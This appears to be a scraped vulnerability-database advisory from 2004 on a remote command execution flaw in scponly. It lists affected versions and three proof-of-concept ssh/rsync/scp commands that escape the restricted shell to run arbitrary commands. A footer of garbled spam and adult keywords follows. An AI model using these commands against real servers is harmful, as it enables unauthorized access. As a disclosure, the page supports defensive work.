about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , SCPOnly Remote Arbitrary Command Execution Vulnerability


Title SCPOnly Remote Arbitrary Command Execution Vulnerability
Published 2004-12-02-12:00AM
Updated 2004-12-03-05:25PM
Class Input Validation Error
CVE   CVE-MAP-NOMATCH
Remote  Yes
Local  No
Credit  Discovery is credited to Jason Wies <jason@xc.net>.
Vulnerable  scponly scponly 3.11
scponly scponly 3.9
scponly scponly 3.8
scponly scponly 3.5
scponly scponly 3.0
scponly scponly 2.4
scponly scponly 2.3
scponly scponly 2.1
scponly scponly 2.0
Gentoo Linux
Not Vulnerable  scponly scponly 4.0
Code   The following proof of concept examples are available:

ssh restricteduser@remotehost 'rsync -e "touch /tmp/example --" localhost:/dev/null /tmp'

scp command.sh restricteduser@remotehost:/tmp/command.sh

ssh restricteduser@remotehost 'scp -S /tmp/command.sh localhost:/dev/null /tmp'
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Tue, 02 Dec 2008 04:57:05 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
news for c www.moxbo. wap.igirls Avizon dat nmap CMS is Fre www.qq8.cn PHP forum Lust bbs.fpoint ATXXXTGP front namithapho ATXXXTGP www.angeli CMS is Fre Count on m Pinkyworld all cartoo 200 /compo t320t dragon fab sex vedieo vBulletin www.xNxx.c free katri wap.igirls Phonerotic Invision+P news for c purmiscuis front pag www.q620.c 6.00 mambo Remo Video sex include fi log nbmemb mambo Remo www.xnxcom vBulletin WWW.vidio I-864W ria sen se Www.Free s www.huangs way poto p Www.Free s shop sql i google